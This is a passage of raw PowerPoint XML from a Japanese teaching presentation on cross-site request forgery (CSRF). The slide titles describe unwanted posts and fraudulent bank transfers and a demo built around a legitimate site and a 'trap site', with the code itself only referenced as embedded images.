              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の被害の代表例</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>意図しない書き込み</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ボタンを押すことでテキストデータが送信され意図しない書き込みをされる。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正送金</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ボタンを押すことで銀行・振込先・金額のデータが送信され意図しない金額が振り込まれる。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375252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679A86-148E-1E64-5F5B-27F08BD0D6B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>における不正アクセスの被害</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダー 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50EE4224-B5E8-3BAD-ED03-DB9655D47BA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>大まかな被害の種類</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正なデータの操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>本来権限のないデータベースのレコードやファイルなどにアクセスして情報を追加・更新・削除や設定の変更など</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>意図しないデータ送信</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>気付けない他サイトへのデータ送信や他サイトのデザインを埋め込んでデータ送信を誘導する</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21976797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436157-A539-4340-010A-3579AC758E64}"/>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F669BCFD-35B2-AE96-8354-AD14B1DD0328}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正送金</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ライブラリ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>データベース接続</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>無画面</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E0B05B6-2BB7-F47F-BABD-6D7BB5972C47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3952466" y="2314465"/>
            <a:ext cx="5833494" cy="4178410"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37878993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47B204-5B5E-F45C-F46D-D7FCCF81BC0E}"/>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3DB15B67-7C39-4EEB-2F6E-57F48252219E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正送金</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ログイン画面</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A4159EC-ABB8-EA84-0001-5967AEC2CD66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3451864" y="2299928"/>
            <a:ext cx="5288272" cy="4351338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26790606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BFB188-F6DC-EC12-00BC-94EFF0CC6F73}"/>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073A09DD-8563-E9F5-E021-34F3A7F31B39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正送金</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>送金画面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>結果画面</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>実行</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFBAA0DB-74FA-7818-1DA5-B929731C91F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2441051" y="2297192"/>
            <a:ext cx="8375374" cy="4363250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3488262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C252CE-CE94-56FF-60F0-6752BC1806F9}"/>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472D7C30-89B7-8C01-709C-8E0DE634433E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正送金</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(HTML)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4D90444-D7AA-2007-F169-2C9F39DBFFCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2606966"/>
            <a:ext cx="10515600" cy="1955872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="テキスト ボックス 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{704ACBF7-E14D-738C-36D9-B31EF16F34D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5479485" y="4562838"/>
            <a:ext cx="1233030" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ogin.html</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3900075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AFC70F-5A2D-3978-7524-8502C0E30BB1}"/>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B0D847A2-CDF7-7B53-7887-2EB39B653658}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正送金</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(HTML)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7941D859-80C4-6842-C2B3-1CCC23537E7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2321286"/>
            <a:ext cx="10515600" cy="2527136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="テキスト ボックス 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{703B5C65-73BB-66B6-D3C8-2B3F87B285F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5084344" y="4848422"/>
            <a:ext cx="2023311" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF_home</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>.html</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16334994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A3A121-F53A-7827-A9C6-34BB5C84EB7D}"/>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8CA2F8B3-F56D-B80A-C98D-F54D4CF5DD26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正送金</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>正常サイト：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ログイン</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29FE732B-BFCD-B836-6B99-66E46838DEA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2727451"/>
            <a:ext cx="10515600" cy="3120652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3699258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400ABF-C0F0-3522-C7DE-5D952529F5A1}"/>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659DC399-3217-DA63-CFBF-DFCA41481A03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正送金</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>正常サイト：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>セッションで名前が表示される。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>各項目を入力して送信を押す。</a:t>
            </a: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D133C7A4-86AA-493D-34EC-CA340CB3B5FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1740392" y="3429000"/>
            <a:ext cx="8711215" cy="3250453"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19576660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27BF41-BFA7-4439-A4E2-8C3E83D9BDEB}"/>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18DC8E38-7CFE-DADF-1C91-4CE184018E4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正送金</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>正常サイト：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>正常に振り込まれたことの確認</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A5AB7B2-B3DF-2F9A-2C2B-01C6FCEA3662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2407226" y="2803744"/>
            <a:ext cx="7377548" cy="3132141"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3293743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66F0E-335B-7580-3492-5D13DAED0B31}"/>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0A6AD193-67CB-04FE-A054-5C947C303067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正送金</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>罠サイト：</a:t>
            </a:r>
            <a:r>
